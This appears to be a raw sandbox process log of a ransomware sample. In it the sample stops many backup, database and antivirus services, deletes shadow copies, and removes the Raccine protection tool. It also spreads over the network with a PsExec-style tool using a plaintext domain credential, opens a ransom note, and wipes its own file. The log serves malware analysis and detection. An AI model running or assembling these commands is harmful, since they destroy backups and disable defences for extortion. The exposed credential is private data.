C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:5596
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:6064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:5140
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:6116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:4936
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:5348
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5540
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5712
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:5588
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5524
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:5436
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:5368
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:5292
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:4472
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:2100
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:5616
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5460
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5404
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:6136
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5884
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5828
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5044
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3808
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5220
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3368
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5544
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5256
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5384
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5600
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5320
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:5772
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵PID:5180
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:5652
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:5476
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:5208
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:5912
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:5484
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:1668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5016
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5372
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5160
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3484
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14 /USER:SHJPOLICE\amer !Omar20122⤵PID:6104
-
-
C:\Users\Admin\AppData\Local\Temp\c4i1vuzz.exe"C:\Users\Admin\AppData\Local\Temp\c4i1vuzz.exe" \10.10.0.14 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe2⤵PID:5252
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:5284
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵PID:4292
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:5316
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:5056
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:5740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe2⤵PID:5744
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5564
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵PID:5560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:6032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:5252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:5784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:3976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:3592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:6136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:5364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:5748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:5732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:5500
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:2104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:5064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:4288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:5172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:4616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:3496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:2116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:2144
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:5300
-
C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:5440
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵PID:4876
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:4604
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:4136
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:4760
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵PID:4656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y4⤵PID:5328
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:4344
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:4896
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:5636
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:4144
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:4608
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵PID:5972
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:4436
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:5864
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y3⤵PID:4732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵PID:5312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y5⤵PID:2200
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y3⤵PID:5052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵PID:5032
-
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y3⤵PID:4612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵PID:4624
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵PID:5788
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y3⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵PID:4928
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y3⤵PID:4476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵PID:4168
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4908
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y3⤵PID:4868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵PID:4660
-
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y3⤵PID:4164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵PID:5460
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y3⤵PID:5772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵PID:5476
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵PID:5660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y4⤵PID:3876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y3⤵PID:4024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y4⤵PID:5284
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y3⤵PID:4252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵PID:6140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:5424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:3228
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵PID:5620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵PID:5800
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:5920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5844
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y3⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵PID:5300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y3⤵PID:2308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵PID:1312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y3⤵PID:5140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y4⤵PID:3168
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:2264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y3⤵PID:3440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵PID:3592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵PID:1532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵PID:5692
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y3⤵PID:4308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y4⤵PID:5740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵PID:5316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y4⤵PID:5696
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y3⤵PID:4400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵PID:6040
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y3⤵PID:4880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y4⤵PID:4132
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y3⤵PID:4196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y4⤵PID:4900
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y3⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵PID:5496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y3⤵PID:5396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵PID:6068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y3⤵PID:5492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y4⤵PID:5560
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:5128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵PID:4744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵PID:4492
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y3⤵PID:5472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵PID:6108
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y3⤵PID:5332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y4⤵PID:4988
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵PID:4980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵PID:5792
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:5324
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y3⤵PID:4560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵PID:6076
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y3⤵PID:4360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y4⤵PID:4764
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:6108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y5⤵PID:5552
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y3⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y4⤵PID:5248
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y3⤵PID:4832
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y3⤵PID:5476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y4⤵PID:280
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y3⤵PID:6136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y4⤵PID:2568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵PID:6060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y4⤵PID:5636
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵PID:4868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵PID:3956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y3⤵PID:4760
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y3⤵PID:4384
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:5944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:5844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵PID:2312
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:5040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:5300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:5240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:3716
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y4⤵PID:6032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y5⤵PID:4280
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y3⤵PID:5424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵PID:1176
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y3⤵PID:4716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y4⤵PID:2200
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y3⤵PID:2276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y4⤵PID:5924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:5644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:5168
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y3⤵PID:588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y4⤵PID:4720
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:5432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:6048
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y3⤵PID:5592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵PID:6112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:5856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:4296
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:4332
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:4604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:4580
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y3⤵PID:5700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵PID:4956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y3⤵PID:4648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y4⤵PID:4992
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y3⤵PID:4952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵PID:5024
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y3⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y4⤵PID:5128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:1972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:5048
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵PID:4860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y4⤵PID:4236
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y3⤵PID:4800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵PID:4864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y3⤵PID:4364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y4⤵PID:4504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y3⤵PID:4188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y4⤵PID:3876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:2584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵PID:4172
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:5324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:1968
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵PID:4948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y4⤵PID:5772
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵PID:4804
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:4436
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵PID:5180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y4⤵PID:3228
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y3⤵PID:5328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y4⤵PID:5908
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:5300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵PID:4180
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵PID:4248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y4⤵PID:5400
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y3⤵PID:5296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y4⤵PID:944
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵PID:5324
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:4380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:5504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:3192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:3592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y3⤵PID:5824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵PID:5964
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y3⤵PID:3672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y4⤵PID:4676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵PID:5352
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:5920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:4132
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y3⤵PID:4720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y4⤵PID:6036
-
-
-
